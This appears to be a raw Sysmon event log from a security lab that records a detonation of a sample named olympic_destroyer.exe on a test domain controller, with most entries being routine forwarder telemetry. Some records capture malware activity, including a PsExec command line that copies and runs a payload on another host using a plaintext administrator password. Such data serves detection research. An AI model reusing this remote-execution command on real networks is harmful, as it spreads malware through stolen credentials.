11:09:03.378{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49294-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295944Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:03.378{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49294-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000295943Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:02.662{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49293-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:06.404{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53FEB393B832F52BE27BD7B63671FEA5,SHA256=DB22F4EED13B993A799BC1E014A88C77B8D6C0BEA89ED138F7D2A77C7A3F25C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220072Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:06.565{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=17970358DD2A54CF0FC47CA65FA10D94,SHA256=6613D7F591BEE3918518FD73E27811358640F49B591AE3842FCFC29E3370F379,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220073Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:07.581{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D9943EED3F12F83C20AD16AB85B4527,SHA256=3F5A5A2C7ADFB0B6674542EED17D1C4F0CA75B41956C4AC811BB7296FED71612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:07.418{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE7D76FDF43B65394DD86CCA984456F1,SHA256=D56448F85B9393F49F70051CD43804861526C094071CB6EEB6271FBD54EC652C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220074Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:08.597{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0306E3332EE10F5F1D869B2437040DFE,SHA256=C0310F4EDF6293F90A8C9DB472998B699C4C78ABDDBB7203E70DB802999907A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.951{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-15D4-6216-E106-000000003802}6392C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.951{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-15D4-6216-E106-000000003802}6392C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295958Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.803{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-15D4-6216-E006-000000003802}6680C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.803{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.803{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.803{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.803{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.803{C8EA50B7-12E6-6216-4B05-000000003802}67926956C:\Temp\olympic_destroyer.exe{C8EA50B7-15D4-6216-E006-000000003802}6680C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4a2f|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000295952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.809{C8EA50B7-15D4-6216-E006-000000003802}6680C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\10.0.1.15 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000295951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.803{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-15D4-6216-E006-000000003802}6680C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000295950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.803{C8EA50B7-15BA-6216-D906-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000295949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:08.434{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7083B5C5652B66188CA1B612D9149E8C,SHA256=A68B124048C5F7CAA202915211598438820EB8975E446312F7881F341F6EF612,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220075Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:09.612{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8CBD78A2CAFCAA64453D5E78716F462,SHA256=8472ADD7539C31CCEC3F66B7A3E860DC2BA0B26EEB343E736578233C91128C67,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:09.451{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D11570238C49E8C75DA4D8C81BD0D549,SHA256=2B4208559F64C57B780B69857710BD3105071BA217BCC091E5E2294FFA3D0D1C,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000295964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:09:09.120{C8EA50B7-15D4-6216-E006-000000003802}6680C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000295963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:09.051{C8EA50B7-F11F-6215-1000-000000003802}364764C:\Windows\system32\svchost.exe{C8EA50B7-15D4-6216-E106-000000003802}6392C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:09.051{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-15D4-6216-E106-000000003802}6392C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:09.036{C8EA50B7-15D4-6216-E106-000000003802}63926276C:\Windows\system32\conhost.exe{C8EA50B7-15D4-6216-E006-000000003802}6680C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:10.471{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=104DB4B483BD5C532AFE65FAA81CFDB0,SHA256=3C752EFA03DED6E58FE84370325B37440582E1F0E9004270A805BA3AA3BEEFA7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220076Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:10.628{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28A0EE16C3FE47EEB8E8F698C211E1ED,SHA256=2F1F52261CAB9283794308E7DB34909B21343118B3FECE2FA6906639F0358C33,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:07.676{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49295-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:11.487{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6F4A676681FDF218FD21DD1DEF3098E,SHA256=301F104E656D5A252E4AC827459704065893556A6F4FB5C212063A7A77971ED8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220078Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:11.643{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47038B847BBDB2C428F536B43683A3B0,SHA256=28EB56E4659720D6D40322066BCD8981D0E45A8F5DE6DB1F6EBC02849717F37C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220077Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:08.499{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51557-false10.0.1.12-8000- 23542300x8000000000000000220079Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:12.659{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86DAE79FA0FCEDF6EEEDA68027762250,SHA256=10583C8DBD6CF5797B47AF64D7F0D8725A205FE21EA239E186E8EB01D6C016B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:12.502{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A79F9D0039E99689981194CFD128DA1B,SHA256=EFDB9C92098F68E349B4B6F6C600D57CC8AD5A4DA3FE6C394390FE0FFE1E7C3B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220080Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:13.893{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADE1CB4C9D53F38BEDB78A06A3257727,SHA256=2955D10A6E5A1FC2F3AA2CE7212D5EBD55B51822DE3375CC748BFAAC4618FE5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:13.517{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000295971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:13.517{C8EA50B7-15BE-6216-DB06-000000003802}5628C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000295970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:13.517{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D545B21D2B1C4DA2938CD0BF66564D88,SHA256=CF7AE61B5134C1369F69B5D6D7E5DD4ED818B8B959B2ABB112563D7D2862107C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220081Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:14.940{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D6F5E64C297617F0020DCB6BEFDDB97,SHA256=ADA90C3017563F8CD44E167800DD4F5AF4D553DDFB0E3EFB7D49D108C3420150,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:14.533{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C792D5D631DB526084901A92EAE09027,SHA256=16C94578F8C36A4DA4281109A78CC11347778C493EAFE863E485327E33455371,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:15.548{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDFC0833D81EA3BA70C76CFB405DC116,SHA256=7A34CF960CD22FB9E6E00750E5799BA07D4DD0A2211C8C99142D473BF9F0B6B2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220082Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:13.640{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51558-false10.0.1.12-8000- 23542300x8000000000000000295976Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:16.567{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E5B766FE68A86EC58192FBF30D5B1EF,SHA256=8D4BFFFBB3E539BDA1A563AE026061D3939E13F69086EA35B9BB8E1F3A14D0A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220083Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:16.175{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC83D8F4F0B90AF4E2B1D335688357DF,SHA256=870418903A8934D6DE80D1E3D0B3136BF012D5A568EE076371A1CFD1B87EBA68,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295975Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 